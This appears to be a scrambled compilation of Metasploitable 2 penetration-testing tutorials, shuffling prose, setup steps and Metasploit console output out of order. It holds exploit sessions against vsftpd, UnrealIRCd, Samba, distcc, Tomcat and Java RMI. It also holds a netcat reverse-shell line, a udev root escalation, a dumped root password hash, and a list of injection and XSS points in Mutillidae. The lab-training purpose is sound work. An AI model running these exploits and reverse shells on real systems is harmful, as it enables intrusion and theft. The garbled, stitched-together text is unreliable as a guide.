Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. RHOST 192.168.127.154 yes The target address
TIMEOUT 30 yes Timeout for the Telnet probe
[*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2021-02-06 23:51:01 +0300
For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. It helps penetration testers choose and configure exploits. msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
However, we figured out that we could use Metasploit against one of them in order to get a shell, so we're going to detail that here. Execute Metasploit framework by typing msfconsole on the Kali prompt: Search all . This is an issue many in infosec have to deal with all the time.
Starting Nmap 6.46 (, msf > search vsftpd
[*] Meterpreter session, using get_processes to find netlink pid
Here's a description and the CVE number: On Debian-based operating systems (OS), OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 uses a random number generator that produces predictable numbers, making it easier for remote attackers to perform brute-force guessing attacks on cryptographic keys. ---- --------------- -------- -----------
Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator.
LHOST => 192.168.127.159
Exploiting Samba Vulnerability on Metasploit 2 The screenshot below shows the results of running an Nmap scan on Metasploitable 2. Module options (exploit/multi/http/tomcat_mgr_deploy):
Metasploitable 2 has deliberately vulnerable web applications pre-installed. RHOST yes The target address
Redirect the results of the uname -r command into file uname.txt. RETURN_ROWSET true no Set to true to see query result sets
[*] Automatically selected target "Linux x86"
https://information.rapid7.com/metasploitable-download.html, https://sourceforge.net/projects/metasploitable/. Setting the Security Level from 0 (completely insecure) through to 5 (secure). PASSWORD => tomcat
Metasploitable 2 is a deliberately vulnerable Linux installation. root 2768 0.0 0.1 2092 620 ? [*] Command: echo VhuwDGXAoBmUMNcg;
[*] Transmitting intermediate stager for over-sized stage(100 bytes)
This must be an address on the local machine or 0.0.0.0
More investigation would be needed to resolve it. Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1.
Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers.
We're not going to go into the web applications here because, in this article, we're focused on host-based exploitation.
This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms. [*] Writing to socket A
[*] Matching
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
payload => linux/x86/meterpreter/reverse_tcp
VHOST no HTTP server virtual host
A vulnerability in the history component of TWiki is exploited by this module. RPORT 21 yes The target port
RHOSTS yes The target address range or CIDR identifier
Let's begin by pulling up the Mutillidae homepage: Notice that the Security Level is set to 0, Hints is also set to 0, and that the user is not Logged In. nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572
SESSION yes The session to run this module on.
[+] UID: uid=0(root) gid=0(root)
individual files in /usr/share/doc/*/copyright.
It is inherently vulnerable since it transmits data in plain text, leaving many security holes open. : CVE-2009-1234 or 2010-1234 or 20101234) Be sure your Kali VM is in "Host-only Network" before starting the scan, so you can communicate with your target Metasploitable VM. Notice that it does not function against Java Management Extension (JMX) ports, as they do not allow remote class loading unless some other RMI endpoint is active in the same Java process. This document outlines many of the security flaws in the Metasploitable 2 image. Step 4: Choose "Use an existing virtual hard drive file", click the folder icon and select C:/users/UserName/VirtualBox VMs/Metasploitable2/Metasploitable.vmdk. PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
[*] Sending stage (1228800 bytes) to 192.168.127.154
[*] A is input
RHOST => 192.168.127.154
[*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb
XSS via logged-in user name and signature. The Setup/reset the DB menu item can be enabled by setting the uid value of the cookie to 1. DOM injection on the add-key error message, because the key entered is output into the error message without being encoded. You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value. You can SQL inject the UID cookie value because it is used to do a lookup. You can change your rank to admin by altering the UID value. HTTP Response Splitting via the logged-in user name, because it is used to create an HTTP header. This page is responsible for cache-control but fails to do so. This page allows the X-Powered-By HTTP header. HTML comments. There are secret pages that, if browsed to, will redirect the user to the phpinfo.php page. We can read the passwords now and all the rest: root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.
[*] Matching
Cross-site scripting on the host/ip field. OS command injection on the host/ip field. This page writes to the log. USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line
msf exploit(unreal_ircd_3281_backdoor) > exploit
msf exploit(distcc_exec) > show options
SQLi and XSS on the log are possible. GET for POST is possible because only reading POSTed variables is not enforced. RPORT 3632 yes The target port
As the payload is run as the constructor of the shared object, it does not have to adhere to particular Postgres API versions. 0 Automatic Target
Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). ---- --------------- -------- -----------
The example below uses rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. msf exploit(java_rmi_server) > show options
After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. -- ----
PASSWORD no A specific password to authenticate with
Then, hit the "Run Scan" button in the . . RHOST => 192.168.127.154
LHOST yes The listen address
In this example, Metasploitable 2 is running at IP 192.168.56.101.
msf auxiliary(telnet_version) > run
[*] B: "ZeiYbclsufvu4LGM\r\n"
[*] Matching
gcc root.c -o rootme (This will compile the C file to an executable binary) Step 12: Copy the compiled binary to the msfadmin directory in the NFS share. Just enter ifconfig at the prompt to see the details for the virtual machine.
[*] Accepted the second client connection
Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment.". Metasploitable 3 is the updated version based on Windows Server 2008. [*] Command: echo qcHh6jsH8rZghWdi;
echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run, nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539]
df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev
TOMCAT_PASS no The Password for the specified username
[*] Reading from sockets
Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres. The default login and password is msfadmin:msfadmin.
LHOST => 192.168.127.159
USERNAME no The username to authenticate as
[*] udev pid: 2770
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:33383) at 2021-02-06 23:03:13 +0300
If so please share your comments below.
SRVPORT 8080 yes The local port to listen on. RHOSTS yes The target address range or CIDR identifier
The following command line will scan all TCP ports on the Metasploitable 2 instance: Nearly every one of these listening services provides a remote entry point into the system.
Browsing to http://192.168.56.101/ shows the web application home page.
[+] Backdoor service has been spawned, handling
The primary administrative user msfadmin has a password matching the username. rapid7/metasploitable3 Wiki.
5. port 1524 (Ingres database backdoor) This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP). Module options (auxiliary/scanner/smb/smb_version):
Below is a list of the tools and services that this course will teach you how to use.
[*] A is input
nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks
Name Current Setting Required Description
You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g.
Exploit target:
[*] Reading from sockets
root, http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar
whoami
Step 5: Select your Virtual Machine and click the Settings button. When hacking computer systems, it is essential to know which systems are on your network, and also which IP or IPs you are attempting to penetrate.
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. Have you used Metasploitable to practice Penetration Testing?
Select Metasploitable VM as a target victim from this list. Metasploitable 2 is available at: CVE is a list of publicly disclosed cybersecurity vulnerabilities that is free to search, use, and incorporate into products and services, per the terms of use. Within Metasploitable edit the following file via command: Next change the following line then save the file: In Kali Linux bring up the Mutillidae web application in the browser as before and click the Reset DB button to re-initialize the database. msf exploit(usermap_script) > set RHOST 192.168.127.154
[*] Reading from socket B
The advantage is that these commands are executed with the same privileges as the application. Combining Nmap with Metasploit for a more detailed and in-depth scan on the client machine.
LHOST => 192.168.127.159
The easiest way to get a target machine is to use Metasploitable 2, which is an intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities.
[*] Writing exploit executable (1879 bytes) to /tmp/DQDnKUFLzR
If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH. You can edit any TWiki page.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Our first attempt failed to create a session: The following commands to update Metasploit to v6.0.22-dev were tried to see if they would resolve the issue: Unfortunately the same problem occurred after the version upgrade, which may have been down to the database needing to be re-initialized. In Metasploit, an exploit is available for the vsftpd version. Name Current Setting Required Description
[*] 192.168.127.154:5432 Postgres - Disconnected
THREADS 1 yes The number of concurrent threads
For your test environment, you need a Metasploit instance that can access a vulnerable target.
Both operating systems will be running as VMs within VirtualBox.
You could log on without a password on this machine. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image.
0 Generic (Java Payload)
This document outlines many of the security flaws in the Metasploitable 2 image.
Name Current Setting Required Description
Name Current Setting Required Description
[*] A is input
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname
Same as login.php.
RPORT 1099 yes The target port
By default, msfconsole opens up with a banner; to remove that and start the interface in quiet mode, use the msfconsole command with the -q flag. Step 3: Set the memory size to 512 MB, which is adequate for Metasploitable2. -- ----
Initially, to get the server version we will use an auxiliary module: Now we can use an appropriate exploit against the target with the information in hand: Samba username map script Command Execution. We will do this by hacking FTP, telnet and SSH services. We've used an Auxiliary Module for this one: So you know the msfadmin account credentials now, and if you log in and play around, you'll figure out that this account has sudo rights, so you can execute commands as root. [*] Writing to socket B
And this is what we get: Id Name
RPORT => 8180
msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787
Previous versions of Metasploitable were distributed as a VM snapshot where everything was set up and saved in that state. nmap -p1-65535 -A 192.168.127.154
Name Current Setting Required Description
whoami
Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques. This program makes it easy to scale large compiler jobs across a farm of like-configured systems. Exploit target:
The exploit executes /tmp/run, so throw in any payload that you want. 22. Exploit target:
[*] Started reverse handler on 192.168.127.159:4444
So, as before with MySQL, it is possible to log into this database, but we have checked for the available exploits in Metasploit and discovered one which can further the exploitation: The Postgres account may write to the /tmp directory on some standard Linux installations of PostgreSQL and source the UDF shared libraries from there, enabling arbitrary code execution. Enter the required details on the next screen and click Connect. USERNAME postgres no A specific username to authenticate as
Step 1: Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. Such virtual machines are mainly used for security training, testing security tools, or simply practising common penetration testing techniques.
[*] Attempting to automatically select a target
0 Automatic
Do you have any feedback on the above examples?
NetlinkPID no Usually udevd pid-1.
By default, Metasploitable's network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network. Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. Individual web applications may additionally be accessed by appending the application directory name onto http://